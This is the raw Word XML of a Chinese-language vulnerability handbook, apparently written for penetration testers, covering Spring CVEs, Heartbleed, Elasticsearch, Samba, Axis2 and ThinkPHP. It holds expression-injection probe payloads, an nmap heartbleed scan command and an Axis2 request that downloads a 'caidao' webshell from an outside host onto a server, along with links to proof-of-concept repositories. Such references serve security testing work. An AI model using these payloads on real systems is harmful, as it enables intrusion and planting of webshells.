      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="62"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>/?payload=${new%20java.lang.String(new%20byte[]{70, 66, 66, 50, 48, 52, 65, 52, 48, 54, 49, 70, 70, 66, 68, 52, 49, 50, 56, 52, 65, 56, 52, 67, 50, 53, 56, 67, 49, 66, 70, 66})}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="62"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>结果：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="62"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>FBB204A4061FFBD41284A84C258C1BFB</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="62"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>返回结果是md5(wooyun)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="62"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>CVE-2017-4971</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"https://github.com/vulhub/vulhub/blob/4d17ab2d4df39eefad5c498c5aa60b036a05494d/spring/CVE-2017-4971/README.md" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="30"/>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>https://github.com/vulhub/vulhub/blob/4d17ab2d4df39eefad5c498c5aa60b036a05494d/spring/CVE-2017-4971/README.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="62"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5751830" cy="3165475"/>
            <wp:effectExtent l="0" t="0" r="127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
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5751830" cy="3165475"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="62"/>
        <w:spacing w:after="0"/>
        <w:ind w:firstLine="481"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>&amp;_T(org.springframework.web.context.request.RequestContextHolder).getRequestAttributes().getResponse().addHeader("vulnerable","True").aaa=n1nty</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="62"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>CVE-2017-8045</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>：</w:t>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"https://xz.aliyun.com/t/36" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="30"/>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>https://xz.aliyun.com/t/36</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>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"https://misakikata.github.io/2020/04/Spring-%E6%A1%86%E6%9E%B6%E6%BC%8F%E6%B4%9E%E9%9B%86%E5%90%88/#CVE-2013-4152-Spring-Framework%E4%B8%AD%E7%9A%84XML%E5%A4%96%E9%83%A8%E5%AE%9E%E4%BD%93%EF%BC%88XXE%EF%BC%89%E6%B3%A8%E5%85%A5" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="30"/>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>https://misakikata.github.io/2020/04/Spring-%E6%A1%86%E6%9E%B6%E6%BC%8F%E6%B4%9E%E9%9B%86%E5%90%88/#CVE-2013-4152-Spring-Framework%E4%B8%AD%E7%9A%84XML%E5%A4%96%E9%83%A8%E5%AE%9E%E4%BD%93%EF%BC%88XXE%EF%BC%89%E6%B3%A8%E5%85%A5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>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"https://github.com/Cryin/Paper/blob/master/Spring%20AMQP%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E(CVE-2017-8045)%E5%88%86%E6%9E%90.md" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="30"/>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>https://github.com/Cryin/Paper/blob/master/Spring%20AMQP%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E(CVE-2017-8045)%E5%88%86%E6%9E%90.md</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 </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="30"/>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>https://github.com/threedr3am/learnjavabug</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t>https://github.com/scopion/POChouse</w:t>
      </w:r>
      <w:bookmarkStart w:id="131" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="131"/>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rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:color w:val="auto"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pP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14"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5747577" cy="1986511"/>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15"/>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16"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5738199" cy="20684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30"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        </w:rPr>
        <w:t>http://192.168.230.140:8080/spring-mvc-showcase/resources/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="30"/>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        </w:rPr>
        <w:t>test</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="30"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        </w:rPr>
        <w:t>.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="30"/>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30"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b w:val="0"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        </w:rPr>
        <w:t>https://paper.seebug.org/665/</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19"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5814654" cy="883514"/>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20"/>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21"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5787579" cy="2054379"/>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26"/>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22"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5864134" cy="3350962"/>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30"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b w:val="0"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        </w:rPr>
        <w:t>https://github.com/spring-projects/spring-data-rest</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="30"/>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30"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        </w:rPr>
        <w:t>https://projects.spring.io/spring-boot/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="30"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>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23"/>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24"/>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25"/>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26"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5791701" cy="3463722"/>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pStyle w:val="6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62"/>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27"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5806462" cy="2182239"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="62"/>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28"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5859077" cy="133617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30"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>https://github.com/Joan016/poc/tree/master/spring/WebFlow</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30"/>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29"/>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30"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        </w:rPr>
        <w:t>https://github.com/Joan016/poc/tree/master/spring/Oauth</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="30"/>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30"/>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32"/>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3"/>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30"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>https://github.com/Joan016/poc/tree/master/spring/Oauth</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="30"/>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4"/>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5"/>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30"/>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3"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:ind w:leftChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统组件及配置漏洞</w:t>
      </w:r>
      <w:bookmarkEnd w:id="30"/>
      <w:bookmarkEnd w:id="31"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:bookmarkStart w:id="34" w:name="_Toc527108534"/>
      <w:bookmarkStart w:id="35" w:name="_Toc27676920"/>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30"/>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0"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52"/>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0" b="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31"/>
          <w:rFonts w:hint="default" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        </w:rPr>
        <w:t>nmap -p 443 --script ssl-heartbleed ip</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="59"/>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30"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>https://github.com/scopion/heartbleed-tools</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="30"/>
          <w:rFonts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38"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4890073" cy="350735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27676921"/>
      <w:bookmarkStart w:id="37" w:name="_Toc527108535"/>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52"/>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527108536"/>
      <w:bookmarkStart w:id="39" w:name="_Toc27676922"/>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317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3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27676923"/>
      <w:bookmarkStart w:id="42" w:name="_Toc527108537"/>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30"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>http://x.x.x.x:9200/_nodes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="30"/>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52"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5755640" cy="7162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
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5755640" cy="716280"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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30"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:u w:val="none"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>http://x.x.x.x:5601</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，5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="30"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:u w:val="none"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>601</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="30"/>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30"/>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4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62"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5755640" cy="2867025"/>
            <wp:effectExtent l="0" t="0" r="0" b="952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4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0" b="952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4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0"/>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0" b="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46"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5742846" cy="271928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52"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5767070" cy="2719070"/>
            <wp:effectExtent l="0" t="0" r="5080" b="508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47"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5854440" cy="276033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27676924"/>
      <w:bookmarkStart w:id="44" w:name="_Toc527108538"/>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0"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48"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5795567" cy="2450773"/>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使用了Samba服务的场合。</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30"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>https://gist.github.com/worawit/051e881fc94fe4a49295</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="30"/>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30"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>https://gist.github.com/worawit/33cc5534cb555a0b710b</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30"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>https://github.com/joxeankoret/CVE-2017-7494</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27676925"/>
      <w:bookmarkStart w:id="46" w:name="_Toc527108539"/>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52"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5755640" cy="17011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9"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5767461" cy="1705074"/>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0"/>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0" b="0"/>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52"/>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0" b="0"/>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30"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>http://x.x.x.x/axis2/services/config/download?url=http://evelip/caidao.jsp&amp;;path=D:/webapps/axis2/test.jsp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="30"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>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19050" t="19050" r="13970" b="285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19050" t="19050" r="24130" b="273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30"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>https://www.aliyun.com/jiaocheng/546247.html</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在A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x</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="30"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.x.x.x.cn/axis2</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24"/>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19050" t="19050" r="26670" b="1524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19050" t="19050" r="16510" b="254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52"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:color w:val="auto"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5753735" cy="1613535"/>
            <wp:effectExtent l="0" t="0" r="0" b="571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0"/>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19050" t="19050" r="25400" b="20955"/>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19050" t="19050" r="6350" b="17780"/>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30"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>https://bugs.shuimugan.com/bug/view?bug_no=188574</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="30"/>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0" b="762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52"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rStyle w:val="6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30"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>https://www.exploit-db.com/exploits/44343/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="30"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="63"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="63"/>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53"/>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>漏洞地址：</w:t>
      </w:r>
      <w:bookmarkEnd w:id="53"/>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24"/>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61"/>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30"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>https://www.secpulse.com/archives/16726.html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="30"/>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p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5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30"/>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19050" t="19050" r="12700" b="23495"/>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5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30"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>http://www.iwantacve.cn/index.php/archives/40/</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19050" t="19050" r="25400" b="21590"/>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19050" t="19050" r="6350" b="27940"/>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526872535"/>
      <w:bookmarkStart w:id="55" w:name="_Toc27676934"/>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63"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="53"/>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>漏洞地址：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="63"/>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>ThinkPHP系统。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漏洞级别：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="63"/>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b w:val="0"/>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30"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
